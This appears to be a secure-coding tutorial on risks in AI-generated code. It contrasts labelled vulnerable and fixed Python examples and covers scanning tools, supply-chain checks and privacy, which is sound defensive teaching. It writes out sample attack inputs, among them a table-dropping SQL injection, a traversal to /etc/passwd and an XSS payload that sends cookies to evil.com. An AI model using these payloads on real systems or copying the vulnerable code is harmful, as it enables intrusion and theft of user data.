Security in AI-Assisted Coding

Theory 45 min

Why Security Matters More with AI Code

AI coding assistants generate code by predicting statistically likely patterns from training data. This training data includes millions of repositories — many of which contain insecure code, outdated practices, and even known vulnerabilities.

Critical Warning

Studies show that AI-generated code contains security vulnerabilities in approximately 40% of cases when developers don't specify security requirements in their prompts. AI models optimize for functional correctness, not security by default.

Real-World Analogy

Imagine a chef trained by watching every cooking video on the internet — including ones with bad hygiene practices. The chef can make delicious-looking food, but if you don't specifically ask for food safety compliance, they might skip hand-washing. AI code generation works the same way: you must explicitly request secure coding practices.

Common Security Vulnerabilities in AI-Generated Code

1. SQL Injection

AI models frequently generate code that concatenates user input directly into SQL queries instead of using parameterized queries.

❌ Insecure (AI often generates this):

# VULNERABLE: SQL Injection
@app.get("/users")
def search_users(name: str):
    query = f"SELECT * FROM users WHERE name = '{name}'"
    result = db.execute(query)
    return result.fetchall()

# Attack: name = "'; DROP TABLE users; --"

✅ Secure (what you should require):

# SAFE: Parameterized query
@app.get("/users")
def search_users(name: str):
    query = text("SELECT * FROM users WHERE name = :name")
    result = db.execute(query, {"name": name})
    return result.fetchall()

Even better with an ORM:

# SAFE: SQLAlchemy ORM
@app.get("/users")
def search_users(name: str, db: Session = Depends(get_db)):
    return db.query(User).filter(User.name == name).all()

SQL Injection is #1 for a Reason

SQL injection has been the #1 web application vulnerability for over two decades. AI models, trained on older code, frequently produce injectable queries. Always use parameterized queries or an ORM.

2. Hardcoded Secrets and Credentials

AI models often include placeholder credentials that developers forget to replace:

❌ Insecure:

# VULNERABLE: Hardcoded credentials
DATABASE_URL = "postgresql://admin:password123@db.example.com:5432/production"
API_KEY = "sk-1234567890abcdef"
JWT_SECRET = "super-secret-key"

def get_db():
    return create_engine(DATABASE_URL)

✅ Secure:

# SAFE: Environment variables
import os
from dotenv import load_dotenv

load_dotenv()

DATABASE_URL = os.environ["DATABASE_URL"]
API_KEY = os.environ["API_KEY"]
JWT_SECRET = os.environ["JWT_SECRET"]

def get_db():
    if not DATABASE_URL:
        raise RuntimeError("DATABASE_URL environment variable is not set")
    return create_engine(DATABASE_URL)

3. Insecure Deserialization

AI may suggest using pickle to load untrusted data — a critical vulnerability:

❌ Insecure:

import pickle

# VULNERABLE: Loading untrusted pickle data
def load_model(file_path: str):
    with open(file_path, "rb") as f:
        return pickle.load(f)  # Can execute arbitrary code!

✅ Secure:

import joblib
import hashlib

# SAFE: Verify integrity before loading
EXPECTED_HASH = "sha256:a1b2c3d4..."

def load_model(file_path: str):
    with open(file_path, "rb") as f:
        data = f.read()
    
    file_hash = f"sha256:{hashlib.sha256(data).hexdigest()}"
    if file_hash != EXPECTED_HASH:
        raise ValueError("Model file integrity check failed")
    
    return joblib.load(file_path)

4. Path Traversal

AI-generated file handling code often doesn't validate paths:

❌ Insecure:

# VULNERABLE: Path traversal
@app.get("/files/{filename}")
def get_file(filename: str):
    file_path = f"/uploads/{filename}"
    return FileResponse(file_path)

# Attack: filename = "../../etc/passwd"

✅ Secure:

from pathlib import Path

UPLOAD_DIR = Path("/uploads").resolve()

@app.get("/files/{filename}")
def get_file(filename: str):
    safe_path = (UPLOAD_DIR / filename).resolve()
    
    if not safe_path.is_relative_to(UPLOAD_DIR):
        raise HTTPException(status_code=400, detail="Invalid file path")
    
    if not safe_path.exists():
        raise HTTPException(status_code=404, detail="File not found")
    
    return FileResponse(safe_path)

5. Missing Input Validation

AI often generates the "happy path" without validating inputs:

❌ Insecure:

# VULNERABLE: No input validation
@app.post("/transfer")
def transfer_money(data: dict):
    from_account = data["from"]
    to_account = data["to"]
    amount = data["amount"]
    
    db.execute(f"UPDATE accounts SET balance = balance - {amount} WHERE id = {from_account}")
    db.execute(f"UPDATE accounts SET balance = balance + {amount} WHERE id = {to_account}")
    return {"status": "success"}

✅ Secure:

from pydantic import BaseModel, Field, validator

class TransferRequest(BaseModel):
    from_account: int = Field(..., gt=0)
    to_account: int = Field(..., gt=0)
    amount: float = Field(..., gt=0, le=10000)
    
    @validator("to_account")
    def accounts_must_differ(cls, v, values):
        if "from_account" in values and v == values["from_account"]:
            raise ValueError("Cannot transfer to the same account")
        return v

@app.post("/transfer")
def transfer_money(request: TransferRequest, db: Session = Depends(get_db)):
    with db.begin():
        sender = db.query(Account).filter(Account.id == request.from_account).with_for_update().first()
        if not sender or sender.balance < request.amount:
            raise HTTPException(status_code=400, detail="Insufficient funds")
        
        sender.balance -= request.amount
        receiver = db.query(Account).filter(Account.id == request.to_account).with_for_update().first()
        if not receiver:
            raise HTTPException(status_code=404, detail="Receiver account not found")
        receiver.balance += request.amount
    
    return {"status": "success", "new_balance": sender.balance}

6. Cross-Site Scripting (XSS)

AI may generate web code that doesn't escape user input:

❌ Insecure:

# VULNERABLE: XSS via unescaped HTML
@app.get("/profile/{username}")
def show_profile(username: str):
    return HTMLResponse(f"<h1>Welcome, {username}!</h1>")

# Attack: username = "<script>document.location='http://evil.com/steal?c='+document.cookie</script>"

✅ Secure:

from markupsafe import escape

@app.get("/profile/{username}")
def show_profile(username: str):
    safe_name = escape(username)
    return HTMLResponse(f"<h1>Welcome, {safe_name}!</h1>")

OWASP Top 10 and AI-Generated Code

The OWASP Top 10 is the standard reference for web application security risks. Here's how AI-generated code intersects with each:

OWASP Risk	AI Relevance	Risk Level
A01: Broken Access Control	AI rarely generates authorization checks unless asked	🔴 Critical
A02: Cryptographic Failures	AI may use weak algorithms (MD5, SHA1 for passwords)	🔴 Critical
A03: Injection	SQL, NoSQL, command injection from string concatenation	🔴 Critical
A04: Insecure Design	AI generates code, not architecture — missing security design	🟡 High
A05: Security Misconfiguration	Debug mode on, default credentials, verbose errors	🟡 High
A06: Vulnerable Components	AI may suggest outdated or vulnerable packages	🔴 Critical
A07: Auth Failures	Weak password policies, missing rate limiting, session flaws	🟡 High
A08: Data Integrity Failures	Insecure deserialization (pickle), missing integrity checks	🟡 High
A09: Logging Failures	AI often omits logging; may log sensitive data when it does	🟢 Medium
A10: SSRF	AI-generated URL fetching without validation	🟡 High

Code Scanning and Security Tools

Never rely solely on manual review. Use automated tools to catch vulnerabilities:

Python-Specific Tools

Tool	What It Scans	Integration
Bandit	Python-specific security issues (eval, pickle, SQL)	CLI, CI/CD, pre-commit
Safety	Known vulnerabilities in installed packages	CLI, CI/CD
pip-audit	Package vulnerability database (PyPI)	CLI, GitHub Actions
mypy	Type errors that can lead to security issues	CLI, IDE, CI/CD

General-Purpose Tools

Tool	What It Scans	Language Support
Snyk	Dependencies + code vulnerabilities	Python, JS, Java, Go, ...
SonarQube	Code quality + security vulnerabilities	30+ languages
Semgrep	Custom static analysis rules	Python, JS, Go, Java, ...
Trivy	Container images + IaC + filesystem	Universal
CodeQL	Deep semantic code analysis	Python, JS, Java, C/C++, Go

Example: Running Bandit on AI-Generated Code

# Install bandit
pip install bandit

# Scan a single file
bandit -r my_ai_generated_code.py

# Scan entire project with medium+ severity
bandit -r ./src -ll

# Generate a report
bandit -r ./src -f json -o security_report.json

Example Bandit output:

>> Issue: [B608:hardcoded_sql_expressions] Possible SQL injection vector
   Severity: Medium   Confidence: Low
   Location: ./api/routes.py:42
   More Info: https://bandit.readthedocs.io/en/latest/plugins/b608

41      def search_users(name: str):
42          query = f"SELECT * FROM users WHERE name = '{name}'"
43          result = db.execute(query)

Integrating Security Scanning into Your Workflow

View Security Scanning Pipeline

Supply Chain Attacks

The Risk of AI-Suggested Packages

AI models can suggest packages that:

Don't exist — attackers can register these names with malicious code ("dependency confusion")
Are typosquats — similar names to popular packages (e.g., reqeusts vs requests)
Are deprecated — no longer maintained, with known vulnerabilities
Are compromised — legitimate packages whose maintainer accounts were hacked

How to Verify a Package

Before running pip install on any AI-suggested package:

# 1. Check if it exists and see metadata
pip index versions package-name

# 2. Check on PyPI website
# Visit: https://pypi.org/project/package-name/

# 3. Look at download statistics (should be high for legitimate packages)
# Visit: https://pypistats.org/packages/package-name

# 4. Check the GitHub repository linked from PyPI
# - Does it have stars?
# - When was it last updated?
# - Does the author maintain other known packages?

Real Attack: The "pytorch-nightly" Incident

In December 2022, a malicious package torchtriton was uploaded to PyPI and was installed by anyone who ran pip install pytorch-nightly. The package stole SSH keys, AWS credentials, and other sensitive files. Always verify packages before installing.

Checklist: Before Installing an AI-Suggested Package

Verify the package exists on PyPI
Check the download count (major packages have millions of downloads)
Verify the author/maintainer is credible
Check when it was last updated (avoid abandoned packages)
Read the GitHub README and issues
Check for known vulnerabilities: pip-audit or safety check
Compare the exact package name (watch for typosquatting)
Pin the version in your requirements file

Data Privacy When Using AI Tools

What Data Gets Sent to AI Providers

When you use AI coding tools, your code is sent to external servers for processing:

Tool	Data Sent	Data Retention	Can Opt Out?
GitHub Copilot	Current file + context	Not used for training (Business)	Yes (Business plan)
ChatGPT	Everything you paste	May be used for training (Free)	Yes (opt out in settings)
Cursor	Files + project context	Varies by plan and model	Privacy mode available
CodeWhisperer	Current file	Not shared (Professional)	Yes

Data Privacy Risks

Never paste the following into AI chat tools:

API keys, passwords, or tokens
Customer data or PII (Personally Identifiable Information)
Proprietary algorithms or trade secrets
Internal infrastructure details (IPs, hostnames, credentials)
Data subject to compliance requirements (HIPAA, PCI-DSS, GDPR)

Mitigation Strategies

Strategy	Description
Use enterprise plans	Business plans typically don't train on your code
Sanitize before prompting	Replace real secrets with placeholders before pasting
Self-hosted models	Run open-source models locally (Ollama + CodeLlama, DeepSeek)
Code review policies	Require human review of all AI-generated code
DLP tools	Use Data Loss Prevention tools to detect leaked secrets

How to Sanitize Code Before Prompting

# BEFORE SENDING TO AI (your actual code):
DATABASE_URL = "postgresql://prod_admin:X7$kL9mN@db.mycompany.com:5432/customers"
STRIPE_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc"

# AFTER SANITIZING (what you send to AI):
DATABASE_URL = "postgresql://user:password@hostname:5432/dbname"
STRIPE_KEY = "sk_live_XXXXXXXXXXXXXXXXXXXX"

Intellectual Property Concerns

Key Questions for AI-Generated Code

Question	Consideration
Who owns AI-generated code?	Varies by jurisdiction — generally the developer/company
Can AI reproduce copyrighted code?	Yes — AI may reproduce GPL/AGPL code verbatim
License contamination?	If AI copies GPL code into your MIT project, you may have a problem
Patent risks?	AI may generate code that infringes on software patents

Best Practices for IP Protection

Enable code reference detection — GitHub Copilot can flag when suggestions match public code
Use license-aware tools — Some tools filter out suggestions from copyleft repos
Document AI usage — Keep records of what was AI-generated for legal clarity
Review for uniqueness — If a suggestion looks too specific, search for the source
Follow your organization's AI policy — Many companies have specific guidelines

Secure Coding Checklist for AI-Generated Code

Use this comprehensive checklist every time you integrate AI-generated code:

Authentication & Authorization

All endpoints require authentication unless explicitly public
Authorization checks verify the user has permission for the specific resource
Passwords are hashed with bcrypt/argon2 (not MD5/SHA1)
JWT tokens have appropriate expiration times
Rate limiting is applied to auth endpoints

Input Validation

All user inputs are validated (type, length, format, range)
SQL queries use parameterized statements or ORM
File paths are validated against path traversal
URLs are validated before fetching (SSRF prevention)
HTML output is escaped to prevent XSS

Data Protection

No hardcoded credentials, API keys, or secrets
Sensitive data is encrypted at rest and in transit
Logs don't contain passwords, tokens, or PII
Error messages don't leak internal implementation details
Database connections use TLS/SSL

Dependencies

All packages exist on PyPI/npm and are legitimate
Package versions are pinned in requirements files
No known vulnerabilities (checked with pip-audit/safety)
No unnecessary dependencies (minimize attack surface)

Error Handling

Exceptions are caught and handled appropriately
Generic error messages are returned to users (no stack traces)
Detailed errors are logged server-side for debugging
Application doesn't crash on unexpected input

Security-Focused Prompting

To get more secure code from AI, explicitly request security in your prompts:

❌ Insecure prompt:

Write a login endpoint for FastAPI

✅ Security-focused prompt:

Write a secure login endpoint for FastAPI that:
- Uses bcrypt for password verification
- Returns JWT tokens with 15-minute expiry
- Implements rate limiting (5 attempts per minute per IP)
- Returns generic "Invalid credentials" for both wrong email and wrong password
- Logs failed attempts without logging the attempted password
- Uses constant-time comparison for password verification
- Sets secure, HTTP-only cookie flags for the token

Key Takeaways

Concept	Summary
AI security risk	~40% of AI-generated code contains vulnerabilities when security isn't specified
Top vulnerabilities	SQL injection, hardcoded secrets, path traversal, XSS, insecure deserialization
OWASP alignment	AI code frequently triggers OWASP Top 10 categories
Scanning tools	Bandit, Snyk, SonarQube, Semgrep, pip-audit
Supply chain	Verify all AI-suggested packages before installing
Data privacy	Never paste secrets, PII, or proprietary code into AI tools
IP concerns	AI may reproduce copyrighted code — enable reference detection
Secure prompting	Explicitly request security requirements in every prompt

Why Security Matters More with AI Code​

Common Security Vulnerabilities in AI-Generated Code​

1. SQL Injection​

2. Hardcoded Secrets and Credentials​

3. Insecure Deserialization​

4. Path Traversal​

5. Missing Input Validation​

6. Cross-Site Scripting (XSS)​

OWASP Top 10 and AI-Generated Code​

Code Scanning and Security Tools​

Python-Specific Tools​

General-Purpose Tools​

Example: Running Bandit on AI-Generated Code​

Integrating Security Scanning into Your Workflow​

Supply Chain Attacks​

The Risk of AI-Suggested Packages​

How to Verify a Package​

Data Privacy When Using AI Tools​

What Data Gets Sent to AI Providers​

Mitigation Strategies​

How to Sanitize Code Before Prompting​

Intellectual Property Concerns​

Key Questions for AI-Generated Code​

Best Practices for IP Protection​

Secure Coding Checklist for AI-Generated Code​

Authentication & Authorization​

Input Validation​

Data Protection​

Dependencies​

Error Handling​

Security-Focused Prompting​

Key Takeaways​

Further Reading​

Why Security Matters More with AI Code

Common Security Vulnerabilities in AI-Generated Code

1. SQL Injection

2. Hardcoded Secrets and Credentials

3. Insecure Deserialization

4. Path Traversal

5. Missing Input Validation

6. Cross-Site Scripting (XSS)

OWASP Top 10 and AI-Generated Code

Code Scanning and Security Tools

Python-Specific Tools

General-Purpose Tools

Example: Running Bandit on AI-Generated Code

Integrating Security Scanning into Your Workflow

Supply Chain Attacks

The Risk of AI-Suggested Packages

How to Verify a Package

Data Privacy When Using AI Tools

What Data Gets Sent to AI Providers

Mitigation Strategies

How to Sanitize Code Before Prompting

Intellectual Property Concerns

Key Questions for AI-Generated Code

Best Practices for IP Protection

Secure Coding Checklist for AI-Generated Code

Authentication & Authorization

Input Validation

Data Protection

Dependencies

Error Handling

Security-Focused Prompting

Key Takeaways

Further Reading